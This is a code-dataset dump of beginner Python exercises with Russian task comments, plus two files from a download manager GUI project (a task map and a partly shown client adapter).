"text": "#Вывести все пятизначные числа, которые делятся на 2, у которых средняя цифра нечетная, и сумма всех цифр делится на 4.\n\nfor i in range (10000,99999):\n d_1 = i // 10000\n d_2 = i // 1000 % 10\n d_3 = i // 100 % 10\n d_4 = i // 10 % 10\n d_5 = i % 10\n if i % 2 == 0:\n if d_3 % 2 != 0:\n if (d_1 + d_2 + d_3 + d_4 + d_5) % 4 == 0:\n print(i)\n"
},
{
"alpha_fraction": 0.3877550959587097,
"alphanum_fraction": 0.6122449040412903,
"avg_line_length": 23.5,
"blob_id": "54cc8ec53096e81573bca54397141bd16052e89e",
"content_id": "a8f9aa3b6646a71a1d416ba418c956e3af114210",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 63,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 2,
"path": "/Practic/Tasks/7.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите 12+14. Ответ: 0.75.\nprint (1/2 + 1/4)\n"
},
{
"alpha_fraction": 0.5086705088615417,
"alphanum_fraction": 0.5953757166862488,
"avg_line_length": 18.22222137451172,
"blob_id": "4681dbaece1799188731cbf9173af159c0c50317",
"content_id": "f8e2cfad47c62d3f467763d96dd72318e7e30da0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 231,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 9,
"path": "/Practic/Tasks/41.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число. Если оно более 100 или менее -100, то занулить, иначе увеличить его на 1.\n\nx = int(input(\"x:\"))\n\nif -100 <= x <= 100:\n print(x+1)\nelse:\n x=0\n print(x)\n"
},
{
"alpha_fraction": 0.5692307949066162,
"alphanum_fraction": 0.5692307949066162,
"avg_line_length": 13.44444465637207,
"blob_id": "bb12a7d4b4231b6c2c6eefbeeb26177ef5d2cb14",
"content_id": "98233b93196369be19fe6ade789264206c0c3fa9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 9,
"path": "/Practic/Tasks/37.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано два числа. Вывести наибольшее из них.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\n\nif x > y:\n print(x)\nelse:\n print(y)\n"
},
{
"alpha_fraction": 0.5637065768241882,
"alphanum_fraction": 0.5984556078910828,
"avg_line_length": 18.769229888916016,
"blob_id": "306017a441cdb198d5f731bf1dd3f5e19fd96b0b",
"content_id": "84ae253673a051df303c6de11a20eeb42bb16afe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 377,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 13,
"path": "/Practic/Tasks/30.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число a. Не пользуясь никакими арифметическими\n# операциями кроме умножения, получите\n# а)a**4 за две операции;\n# б) a**6 за три операции;\n# в) a**15 за пять операций.\n\na = 3\n\nz = a * a * a * a#4\nx = z * a * a#6\nc = x * x * a * a * a#15\n\nprint(z,x,c)\n\n\n"
},
{
"alpha_fraction": 0.5260869860649109,
"alphanum_fraction": 0.6304348111152649,
"avg_line_length": 18.16666603088379,
"blob_id": "3d3dbad475c79010923b8be1a7bf652c6028a9d8",
"content_id": "d57275aece2561d994a086b9f75b108a49a0c8cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 12,
"path": "/Practic/Tasks/90.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найти сумму cos3/5+cos5/7+cos7/9+...+cos111/113.\n\nimport math\nfrom fractions import Fraction\n\ni = math.cos(Fraction(3, 5))\ng = 0\n\nwhile i > math.cos(Fraction(111, 113)):\n i += math.cos(Fraction(4, 35))\n g =+ i\n print(g)\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 23,
"blob_id": "9cbd11ed14a7ee3a6984549b254a355f06575608",
"content_id": "da150f8d23a1dc6d1f0f3bfccd596743d0e6264d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 3,
"path": "/Practic/Tasks/1.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран текст Silence is golden.\n\nprint (\"Silence is golden\")\n"
},
{
"alpha_fraction": 0.6310679316520691,
"alphanum_fraction": 0.6796116232872009,
"avg_line_length": 33.33333206176758,
"blob_id": "4f09317771c26c5f5a73ee5c227aacc985aa5353",
"content_id": "d24a6b22237d98f49573d8ee767d92a6d0a7edd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 3,
"path": "/Practic/Tasks/75.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран 10 раз фразу \"You are welcome!\"\nfor i in range (0,10):\n print(\"You are welcome\")\n"
},
{
"alpha_fraction": 0.35087719559669495,
"alphanum_fraction": 0.4649122953414917,
"avg_line_length": 15.285714149475098,
"blob_id": "bce3526ba046b3e77a17f513a8823c07439a97d6",
"content_id": "3c0c004565a8a7e8edbcfcf60b1eabc9b3b069ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 7,
"path": "/Practic/Tasks/82.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран числа 1.2, 1.4, 1.6, ..., 2.8\n\ni = float (1)\n\nwhile i < 3:\n i += 0.2\n print(\"%.1f\" % i )\n"
},
{
"alpha_fraction": 0.5159574747085571,
"alphanum_fraction": 0.521276593208313,
"avg_line_length": 16.090909957885742,
"blob_id": "b5c2bf69c2790865fe6fd905689088de2406110d",
"content_id": "90087f9d3fce3546403505062bdae0ddc6a11740",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 11,
"path": "/Practic/Tasks/78.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран фигуру из звездочек:\n#*******\n#*******\n#*******\n#*******\n#(квадрат из n строк, в каждой строке n звездочек)\n\nn = int(input(\"n:\"))\n\nfor i in range (0,n):\n print(\"*\"*n)\n"
},
{
"alpha_fraction": 0.5161290168762207,
"alphanum_fraction": 0.5161290168762207,
"avg_line_length": 16.714284896850586,
"blob_id": "63fee284f3c5e11db4ab1f676322232603b9a841",
"content_id": "f9ab75e25471d2a9409a1915b6b33d7c8393957b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 14,
"path": "/Practic/Tasks/50.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны три числа. Написать \"yes\", если среди них есть одинаковые.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nif x == y == z:\n print (\"Yes\")\nif x == y:\n print(\"Yes\")\nif x == z:\n print(\"Yes\")\nif y == z:\n print(\"Yes\")\n"
},
{
"alpha_fraction": 0.46492984890937805,
"alphanum_fraction": 0.5991984009742737,
"avg_line_length": 20.69565200805664,
"blob_id": "3f3704eda495bf87aed87d06272bcccae589d69c",
"content_id": "662462eb9a7f9ee3400b562744aee3272e26815b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 573,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 23,
"path": "/Practic/Tasks/62.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано пятизначное число. Цифры на четных позициях занулить. Например, из 12345 получается число 10305.\n\n\nvalue = int(input(\"Value:\"))\n\n\ndigit_1 = value // 10000\ndigit_2 = value // 1000 % 10\ndigit_3 = value // 100 % 10\ndigit_4 = value // 10 % 10\ndigit_5 = value % 10\n\nif digit_1 % 2 == 0:\n digit_1 = 0\nif digit_2 % 2 == 0:\n digit_2 = 0\nif digit_3 % 2 == 0:\n digit_3 = 0\nif digit_4 % 2 == 0:\n digit_4 = 0\nif digit_5 % 2 == 0:\n digit_5 = 0\nprint(digit_1,digit_2,digit_3,digit_4,digit_5)\n"
},
{
"alpha_fraction": 0.5754716992378235,
"alphanum_fraction": 0.599056601524353,
"avg_line_length": 15.307692527770996,
"blob_id": "297f83ff5b30836041fd8f9b25097e6da3d29568",
"content_id": "b04178de67fd7b26e846790449b33cccd6296df8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 13,
"path": "/Practic/Tasks/36.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит номер месяца, вывести название месяца.\n\n\nx = int(input(\"x:\"))\n\nif x == 1:\n print(\"January\")\nelif x == 2:\n print(\"February\")\nelif x == 3:\n print(\"March\")\nelse:\n print(\"input 1-3\")\n"
},
{
"alpha_fraction": 0.5503876209259033,
"alphanum_fraction": 0.5503876209259033,
"avg_line_length": 18.846153259277344,
"blob_id": "bda0d5644cdfa782c377af69191e0b0092d6983b",
"content_id": "33cd6e047d5e53118a6aae46215bfa59d80346e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 328,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 13,
"path": "/Practic/Tasks/51.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны три числа. Написать \"yes\", если можно взять какие-то два из них и в сумме получить третье\n\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nif x + y == z:\n print(\"Yes\")\nif x + z == y:\n print(\"Yes\")\nif y + z == x:\n print(\"Yes\")\n"
},
{
"alpha_fraction": 0.597484290599823,
"alphanum_fraction": 0.6289308071136475,
"avg_line_length": 25.5,
"blob_id": "242fad62e59db41171107dd8a3042aeb36f852d7",
"content_id": "5d71cdaf3f36631caa97c49f3ec5d450635c10c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 222,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 6,
"path": "/Practic/Tasks/106.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран n единиц, затем 2n двоек, затем 3n троек. Число n вводит пользователь.\n\nn = int(input(\"n:\"))\nprint (\"1\" * n)\nprint (\"2\" * n)\nprint (\"3\" * n)\n"
},
{
"alpha_fraction": 0.5194507837295532,
"alphanum_fraction": 0.5240274667739868,
"avg_line_length": 26.25,
"blob_id": "5547011a9439a9085a67fcf27b7b64add847989a",
"content_id": "10f3fa716c4184ed06eb5c41caa6440060748131",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 560,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 16,
"path": "/Practic/Tasks/85_.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "# Пользователь вводит количество строк. Вывести на экран логотип соответствующего размера. Если текст не помещается, то вывести логотип без текста.\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\n\nfor i in range(a):\n if i == 0 or i == a:\n for j in range(a):\n print(\"[\", end=\" \")\n\n else:\n print(\"[\", end=\" \")\n for j in range(1, b):\n print(\":\", end=\" \")\n print(\"[\", end=\" \")\n print()\n\n"
},
{
"alpha_fraction": 0.6056910753250122,
"alphanum_fraction": 0.6382113695144653,
"avg_line_length": 26.33333396911621,
"blob_id": "52c32dc77e5a56288b9bcabedb5bc19dc1e27a2b",
"content_id": "059c1ab2a5dfaf7ed3fb442dcc3a82a62dcc845e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 346,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 9,
"path": "/Practic/Tasks/44.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит два числа. Если они не равны 10 и первое число четное, то вывести их сумму, иначе вывести их произведение.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\n\nif x !=10 and y != 10 and x % 2 == 0:\n print(x+y)\nelse:\n print(x*y)\n"
},
{
"alpha_fraction": 0.37378641963005066,
"alphanum_fraction": 0.4902912676334381,
"avg_line_length": 24.75,
"blob_id": "de51af5cfc230c60f1ccf5f1feb316835518983a",
"content_id": "9251e12d204b2f803607dc72a3b232a0af02e5dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 8,
"path": "/Practic/Tasks/103.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найдите трехзначные числа, равные сумме кубов своих цифр.\n\nfor i in range(100, 999):\n d_1 = i // 100\n d_2 = i // 10 % 10\n d_3 = i % 10\n if d_1 ** 3 + d_2 ** 3 + d_3 ** 3 == i:\n print(i)\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5133333206176758,
"avg_line_length": 15.666666984558105,
"blob_id": "6e7527bccaa5e0755d61fd030641829a240e87db",
"content_id": "0bde71639abc55e25120d11cf4285a6068ec34b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 9,
"path": "/Practic/Tasks/108.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран строки (в последней строке n звездочек):\n#*\n#**\n#***\n#****\n#*****\nn = int(input(\"n:\")) + 1\nfor i in range (1,n):\n print(\"*\"*i)\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.695035457611084,
"avg_line_length": 19.14285659790039,
"blob_id": "88d0aa18e4f314fe924fa2c33141024bba37442d",
"content_id": "edb4271e7dfb2239a0c0b60f2192b4d74f33966b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 7,
"path": "/Practic/Tasks/22.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано значение температуры в градусах Цельсия. Вывести температуру в градусах Фаренгейта.\n\nt = int(input(\"t:\"))\n\nf = t * 9/5 + 32\n\nprint(f)\n"
},
{
"alpha_fraction": 0.6938775777816772,
"alphanum_fraction": 0.7074829936027527,
"avg_line_length": 48,
"blob_id": "7049b612edcecb5fcf29bbbe5e50cc7ee268376b",
"content_id": "70db50c034eb3e6099f6e621cc64eeba4fcbfe46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 3,
"path": "/Practic/Tasks/107-.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести ряд чисел: десять десяток, девять девяток, восемь восьмерок, ... , одну единицу. Найти сумму всех этих чисел.\nfor i in \"10\":\n print(i)\n"
},
{
"alpha_fraction": 0.4921875,
"alphanum_fraction": 0.6145833134651184,
"avg_line_length": 41.55555725097656,
"blob_id": "3d26f0a71b167debf9e8c9342ac4459a1cde4a14",
"content_id": "74212a9c81f90a1ff604d49f351af1bf77523297",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 9,
"path": "/Practic/Tasks/99.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран числа от 1000 до 9999 такие, что все цифры различны.\n\nfor value in range(1000, 9999):\n digit_1 = value // 1000\n digit_2 = value // 100 % 10\n digit_3 = value // 10 % 10\n digit_4 = value % 10\n if digit_1 != digit_2 and digit_1 != digit_3 and digit_1 != digit_4 and digit_2 != digit_3 and digit_2 != digit_4 and digit_3 != digit_4:\n print(value)\n\n"
},
{
"alpha_fraction": 0.6910569071769714,
"alphanum_fraction": 0.6951219439506531,
"avg_line_length": 23.600000381469727,
"blob_id": "5c91f5b94d9039e312a5509c00e210f677df4730",
"content_id": "1ac902f88c637d236fbc38ee5469e58e998d630f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 381,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 10,
"path": "/Practic/Tasks/23.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Известно, что x кг конфет стоит a рублей. Определите, сколько стоит y кг этих конфет,\n# а также сколько кг конфет можно купить на k рублей. Все значения вводит пользователь.\n\n\n\na = float(input(\"a:\"))\n\nx = float(input(\"x:\"))\n\nprint(\"1 кг:\", a/x)\n"
},
{
"alpha_fraction": 0.5806451439857483,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 32.38461685180664,
"blob_id": "a0f9427447fbd4631b074b9633d220b4df5c24f1",
"content_id": "688abae843ef2bba0141d85dbbf35e9941eda9e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 272,
"num_lines": 13,
"path": "/Practic/Tasks/84.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит курс доллара в рублях. Показать таблицу цен 1$, 2$, ..., 100$ в рублях, третьим столбцом добавить количество кг конфет, которые можно купить на данные суммы, если цена 1 кг конфет равна 20 руб. Пример: 1$ - 70 р - 3.5 кг и так далее (всего 100 строк).\n\ni = 1\nua = 0\ncandies = 0\n\nwhile i < 101:\n print(i,\"dolar\")\n ua += 27\n print(\"ua:\",ua)\n candies += 3.5\n print(\"candies:\",candies,\"kg\")\n i += 1\n"
},
{
"alpha_fraction": 0.631147563457489,
"alphanum_fraction": 0.6393442749977112,
"avg_line_length": 17.769229888916016,
"blob_id": "d5d48f570dec25225a5ce013285919e7f900f6c0",
"content_id": "4292a33dc2da6c61ae3bc00914be71efe1c5ccfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 13,
"path": "/Practic/Tasks/110.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран:\n#AAABBBAAABBBAAABBB\n#BBBAAABBBAAABBBAAA\n#AAABBBAAABBBAAABBB\n#(таких строк n, в каждой строке m троек AAA)\n\nn = int(input(\"n:\"))\nm = int(input(\"m:\"))\ni = 0\nwhile i < n:\n i+=1\n print(\"AAABBB\" * m)\n print(\"BBBAAA\" * m)\n"
},
{
"alpha_fraction": 0.6111111044883728,
"alphanum_fraction": 0.625,
"avg_line_length": 19.571428298950195,
"blob_id": "6a8eca890e1d0c32f3540977683d14a84cf3f04f",
"content_id": "b313d780b0e875ca35fe2a60459f8ac81d3cfd43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 208,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 7,
"path": "/Practic/Tasks/18.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит сторону квадрата. Найдите периметр и площадь квадрата.\n\na = int(input(\"a:\"))\n\np= 4 * a\ns= a ** 2\nprint(\"p:\",p,'\\t','s:',s)\n"
},
{
"alpha_fraction": 0.6441947817802429,
"alphanum_fraction": 0.6741573214530945,
"avg_line_length": 21.25,
"blob_id": "7a4bf1ac8bb73354a32fb7c7304cd11e2f07a0c5",
"content_id": "9a1c24e1dee0560da0653c789da74d6253385c03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 12,
"path": "/Practic/Tasks/25.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит количество недель, месяцев, лет и получает количество дней за это время.\n# Считать, что в месяце 30 дней.\n\nweek = int(input(\"week:\"))\n\nmonth = int(input(\"month:\"))\n\nyear = int(input(\"year:\"))\n\nday = week * 7 + month * 30 + year * 360\n\nprint(day)\n"
},
{
"alpha_fraction": 0.5174418687820435,
"alphanum_fraction": 0.5174418687820435,
"avg_line_length": 11.285714149475098,
"blob_id": "9c3dd75246eba29cad26126ee8a071b1d52d7d6d",
"content_id": "1b6bd232de23f4e960d58853a0faf2591ae4845a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 14,
"path": "/Practic/Tasks/47.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны три числа. Найдите наибольшее число из них.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nb = x\n\nif x < y:\n b = y\nif b < z:\n b = z\n\nprint(b)\n"
},
{
"alpha_fraction": 0.5149253606796265,
"alphanum_fraction": 0.5597015023231506,
"avg_line_length": 15.75,
"blob_id": "b55f9a6adb2c437a8df20dba96babb94166e1443",
"content_id": "cf082342202ee7b88f50f467b85e45d6ba2acdf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 165,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 8,
"path": "/Practic/Tasks/92.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран сто первых сумм вида 1+2+3+...+n.\ni = 0\nn = int(input(\"n:\"))\nsumm = 0\nwhile i < n:\n i+=1\n summ+=i\nprint(summ)\n"
},
{
"alpha_fraction": 0.5211970210075378,
"alphanum_fraction": 0.5901911854743958,
"avg_line_length": 16.691177368164062,
"blob_id": "8655117207ffc9fdf2ce43718c9b3c7d84e552e2",
"content_id": "a4078e65c97765e1aa911a266881fceca5d522f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1268,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 68,
"path": "/Practic/Tasks/67.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано четырехзначное число. Поменяйте местами наименьшую и наибольшую цифры.\n\nvalue = int(input(\"value:\"))\n\ndigit_1 = value // 1000\ndigit_2 = value // 100 % 10\ndigit_3 = value // 10 % 10\ndigit_4 = value % 10\n\nmaxx = digit_1\n\nminn = digit_1\n\nif digit_1 < digit_2:\n maxx = digit_2\nif maxx < digit_3:\n maxx = digit_3\nif maxx < digit_4:\n maxx = digit_4\nif digit_1 > digit_2:\n minn = digit_2\nif minn > digit_3:\n minn = digit_3\nif minn > digit_4:\n minn = digit_4\n\nprint(maxx,minn)\n\nbuff = minn\nbuff1 = 0\nbuff2 = 0\n\nif maxx == digit_1:\n digit_1 = maxx\n buff1 = digit_1 #max\n digit_1 = minn\nif maxx == digit_2:\n digit_2 = maxx\n buff1 = digit_2\n digit_2 = minn\nif maxx == digit_3:\n digit_3 = maxx\n buff1 = digit_3\n digit_3 = minn\nif maxx == digit_4:\n digit_4 = maxx\n buff1 = digit_4\n digit_4 = minn\n\n\nif minn == digit_1:\n digit_1 = minn\n buff2 = digit_1 #max\n digit_1 = maxx\nif maxx == digit_2:\n digit_2 = minn\n buff2 = digit_2\n digit_2 = maxx\nif maxx == digit_3:\n digit_3 = minn\n buff2 = digit_3\n digit_3 = maxx\nif maxx == digit_4:\n digit_4 = minn\n buff2 = digit_4\n digit_4 = maxx\n\nprint(digit_1,digit_2,digit_3,digit_4)\n"
},
{
"alpha_fraction": 0.6121212244033813,
"alphanum_fraction": 0.6242424249649048,
"avg_line_length": 24.384614944458008,
"blob_id": "e65db5eb42f12ac917c5f9fa8d3dbf1d07168e89",
"content_id": "6ab3395bc884eca5f7dbfc85b476bf7aebd8b7fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 13,
"path": "/Practic/Tasks/17.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит три числа. Найдите среднее арифметическое этих чисел,\n# а также разность удвоенной суммы первого и третьего чисел и утроенного второго числа.\nimport math\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\nc = int(input(\"c:\"))\n\nmean = ( a + b + c ) / 3\n\nd = a * 2 - c * 2 - b * 3\n\nprint(\"mean:\" ,mean, \"\\t\", \"d:\", d)\n"
}
] | 111 |
Benyjuice/XwareDesktop
|
https://github.com/Benyjuice/XwareDesktop
|
fbd4c336f16ca91d35a153d7e439db8c93b36d3d
|
98beeac4b1c86be185b803021c5c2392cd3b2508
|
f6ecd0c02efbb5a19f51cff6f43e1b8dfdc5d387
|
refs/heads/master
| 2021-01-18T14:09:40.668986 | 2014-08-02T06:20:02 | 2014-08-02T06:20:02 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5532251596450806,
"alphanum_fraction": 0.5544123649597168,
"avg_line_length": 29.08333396911621,
"blob_id": "47fa9027f324ad37f0f68f13f31903596d248d2f",
"content_id": "54998ca2ab80dbcb348b33e04ce3a550afc76cb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2527,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 84,
"path": "/src/frontend/libxware/map.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom collections import OrderedDict\nfrom .vanilla import TaskClass\nfrom .item import XwareTaskItem as Item\n\n\n_RUNNING_SPEED_SAMPLE_COUNT = 25\n\n\nclass Tasks(OrderedDict):\n \"\"\"TaskModel underlying data\"\"\"\n\n def __init__(self, adapter, klass):\n super().__init__()\n assert isinstance(klass, TaskClass)\n self.adapter = adapter\n self._klass = klass\n\n def updateData(self, updatingList = None):\n updating = dict(zip(\n map(lambda i: \"{ns}|{id}\".format(ns = self.adapter.namespace, id = i[\"id\"]),\n updatingList),\n updatingList))\n\n currentKeys = set(self.keys())\n updatingKeys = set(updating.keys())\n\n addedKeys = updatingKeys - currentKeys\n modifiedKeys = updatingKeys & currentKeys # Alter/change/modify\n removedKeys = currentKeys - updatingKeys\n\n for k in modifiedKeys:\n self[k].update(updating[k], self._klass)\n\n for k in addedKeys:\n # Note: __setitem__ is overridden\n self[k] = updating[k]\n\n for k in removedKeys:\n # Note: __delitem__ is overridden\n del self[k]\n\n def __setitem__(self, key, value, **kwargs):\n if key in self:\n raise ValueError(\"__setitem__ is specialized for inserting.\")\n ret = self.beforeInsert(key)\n if ret:\n if isinstance(ret, Item):\n item = ret\n item.update(value, self._klass)\n else:\n item = Item(adapter = self.adapter)\n item.update(value, self._klass)\n super().__setitem__(key, item)\n self.afterInsert()\n\n def __delitem__(self, key, **kwargs):\n if self.beforeDelete(self.index(key)):\n popped = self[key]\n super().__delitem__(key)\n self.moveToStash(popped)\n self.afterDelete()\n\n def index(self, key):\n return list(self.keys()).index(key)\n\n # =========================== FOREIGN DEPENDENCY ===========================\n # When attached to TaskManager, set by it\n def beforeInsert(self, key):\n raise NotImplementedError()\n\n def afterInsert(self):\n raise NotImplementedError()\n\n def beforeDelete(self, index):\n raise NotImplementedError()\n\n def moveToStash(self, item):\n raise NotImplementedError()\n\n def afterDelete(self):\n raise NotImplementedError()\n # ======================== END OF FOREIGN DEPENDENCY ========================\n"
},
{
"alpha_fraction": 0.6288007497787476,
"alphanum_fraction": 0.6298811435699463,
"avg_line_length": 31.888324737548828,
"blob_id": "7e441a8a271891510a764b6db3c2fad1dba5be9d",
"content_id": "0758ab7b44fed33038f6a98e56b60171d73efa11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6479,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 197,
"path": "/src/frontend/libxware/adapter.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom launcher import app\n\nimport asyncio\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import partial\nimport threading, uuid\n\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtProperty\nfrom .vanilla import TaskClass, XwareClient, Settings\nfrom .map import Tasks\n\n_POLLING_INTERVAL = 1\n\n\nclass XwareSettings(QObject):\n updated = pyqtSignal()\n\n def __init__(self, parent):\n super().__init__(parent)\n self._settings = None\n\n @pyqtProperty(int, notify = updated)\n def downloadSpeedLimit(self):\n return self._settings.downloadSpeedLimit\n\n @pyqtProperty(int, notify = updated)\n def uploadSpeedLimit(self):\n return self._settings.uploadSpeedLimit\n\n @pyqtProperty(int, notify = updated)\n def slStartTime(self):\n return self._settings.slStartTime\n\n @pyqtProperty(int, notify = updated)\n def slEndTime(self):\n return self._settings.slEndTime\n\n @pyqtProperty(int, notify = updated)\n def maxRunTaskNumber(self):\n return self._settings.maxRunTaskNumber\n\n @pyqtProperty(int, notify = updated)\n def autoOpenLixian(self):\n return self._settings.autoOpenLixian\n\n 